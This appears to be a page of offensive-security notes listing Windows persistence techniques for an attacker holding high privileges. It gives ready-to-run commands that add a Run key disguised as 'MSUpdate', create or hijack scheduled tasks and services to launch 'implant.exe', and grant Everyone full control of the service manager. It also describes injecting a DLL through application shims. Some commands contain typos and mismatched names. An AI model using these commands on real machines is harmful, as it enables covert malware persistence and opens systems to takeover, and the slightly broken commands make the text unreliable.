High Priv User

Persistence techniques for high privileged user

Reg Keys:

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /t REG_SZ /d C:\Windows\Tasks\implant.exe" /f

Scheduled Tasks:

Create New Task:

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create

# normal @ 09:00 daily 
schtasks /create /tn "MyTask\go" /sc daily /st 09:00 /tr "C:\windows\tasks\implant.exe"
# normal @ every 15 minutes
schtasks /create /tn "MyTask\go" /sc minute /mo 15 /tr "C:\windows\tasks\implant.exe"
# normal @ every 3 hours between 9-5
schtasks /create /tn "MyTask\go"  /sc hourly /mo 3 /st 09:00 /etu 17:00 /tr "C:\windows\tasks\implant.exe"


# query
schtasks /query /tn  "MyTask\Go" /fo list /v
# run
schtasks /run /tn "MyTasks/Go"
# delete 
schtasks /delete /tn "MyTasks/Go"

run in an elevated session, and modify the task. copy the xml schtasks:

schtasks /query /tn  "MyTask\Go" /xml > task.xml

Within the <Principals></Principals> section add "<RunLevel>HighestAvailable</RunLevel>" delete the original task, and create using the following: 

# delete
schtasks /delete /f /tn MyTask
# create new from xml
schtasks /create /tn MyTask /xml task.xml
# query 
schtasks /query /tn MyTask /v /xml

Take Over Task/ multiple actions: 

# get old task: 
schtasks /query /tn  "MyTask\Go" /xml > task.xml

# add to the <actions></actions> section in the XML file
<Exec>
    <Command>C:\windows\tasks\implant.exe</command>
</Exec>

# delete the task
schtasks /delete /tn "MyTask" /f
# add task 
schtasks /create /tn "MyTask" /xml task.xml
# check worked in Task to Run section for multiple actions if it worked
schtasks /query /tn "MyTask" /fo list /v

Service:

create new service:

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/sc-create

# create new service
sc create SERVICE_NAME binpath="C:\Windows\Tasks\implant.exe" start=auto
# query 
sc query SERVICE_NAME
# start 
sc start SERVICE_NAME

This will fail, but will still execute. advised to create a new proper service: 

sc.exe sdset scmanager D:(A;;KA;;;WD)

Application Shimming:

x86 is more powerful that x64 noe, so use 32-bit. Use compatability administrator (32-bit) on cmd run:

compatadmin.exe /x

Right click 'New Database > new' name anything, vednor = Microsoft, select a good windows 32-bit. Select InjectDLL on compatability fixes and point it to your compiled DLL. Click save

PreviousLow Priv UserNextIOS

Last updated